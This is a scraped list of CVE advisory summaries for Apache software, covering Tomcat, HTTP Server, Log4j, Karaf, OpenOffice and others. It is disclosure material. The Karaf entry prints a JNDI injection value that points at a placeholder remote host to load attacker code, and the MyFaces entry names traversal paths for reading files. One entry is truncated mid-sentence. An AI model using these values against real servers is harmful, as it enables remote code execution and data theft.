CVSS v3.1 |
| A vulnerability in the OpenOffice Writer DOC file parser before 4.1.4, and specifically in the WW8Fonts Constructor, allows attackers to craft malicious documents that cause denial of service (memory corruption and application crash) potentially resulting in arbitrary code execution. |
| A vulnerability in OpenOffice's PPT file parser before 4.1.4, and specifically in PPTStyleSheet, allows attackers to craft malicious documents that cause denial of service (memory corruption and application crash) potentially resulting in arbitrary code execution. |
| The Apache Qpid Broker for Java can be configured to use different so called AuthenticationProviders to handle user authentication. Among the choices are the SCRAM-SHA-1 and SCRAM-SHA-256 AuthenticationProvider types. It was discovered that these AuthenticationProviders in Apache Qpid Broker for Java 6.0.x before 6.0.6 and 6.1.x before 6.1.1 prematurely terminate the SCRAM SASL negotiation if the provided user name does not exist thus allowing remote attacker to determine the existence of user accounts. The Vulnerability does not apply to AuthenticationProviders other than SCRAM-SHA-1 and SCRAM-SHA-256. |
| Apache HTTP Server, in all releases prior to 2.2.32 and 2.4.25, was liberal in the whitespace accepted from requests and sent in response lines and headers. Accepting these different behaviors represented a security concern when httpd participates in any chain of proxies or interacts with back-end application servers, either through mod_proxy or using conventional CGI mechanisms, and may result in request smuggling, response splitting and cache pollution. |
| A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet. |
| In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. |
| The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not. |
| A vulnerability in import module of Apache Atlas allows an authenticated user to write to web server filesystem. This issue affects Apache Atlas versions from 0.8.4 to 2.2.0. |
|
Improper Check for Unusual or Exceptional Conditions vulnerability handling requests in Apache Traffic Server allows an attacker to crash the server under certain conditions.
This issue affects Apache Traffic Server: from 8.0.0 through 9.1.3.
|
| Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider: before 5.0.0.
|
| This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.
We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 |
| Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client. This vulnerability has been fixed in Apache ShardingSphere 5.3.0. |
| The Apache HTTP Server through 2.4.23 follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "This mitigation has been assigned the identifier CVE-2016-5387"; in other words, this is not a CVE ID for a vulnerability. |
| The CSV export in Apache LDAP Studio and Apache Directory Studio before 2.0.0-M10 does not properly escape field values, which might allow attackers to execute arbitrary commands by leveraging a crafted LDAP entry that is interpreted as a formula when imported into a spreadsheet. |
| The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group. |

(period) characters from the end of the includes directory array, which might allow local users to gain privileges via a Trojan horse module under the current working directory. |
| The AMQP 0-8, 0-9, 0-91, and 0-10 connection handling in Apache Qpid Java before 6.0.3 might allow remote attackers to bypass authentication and consequently perform actions via vectors related to connection state logging. |
| Apache OFBiz 12.04.x before 12.04.06 and 13.07.x before 13.07.03 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections library. |
| Multiple directory traversal vulnerabilities in MyFaces JavaServer Faces (JSF) in Apache MyFaces Core 2.0.x before 2.0.12 and 2.1.x before 2.1.6 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) ln parameter to faces/javax.faces.resource/web.xml or (2) the PATH_INFO to faces/javax.faces.resource/. |
| Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Kylin.
If an attacker gets access to Kylin's system or project admin permission, the JDBC connection configuration maybe altered to execute arbitrary code from the remote. You are fine as long as the Kylin's system and project admin access is well protected.
This issue affects Apache Kylin: from 4.0.0 through 5.0.1.
Users are recommended to upgrade to version 5.0.2 or above, which fixes the issue. |
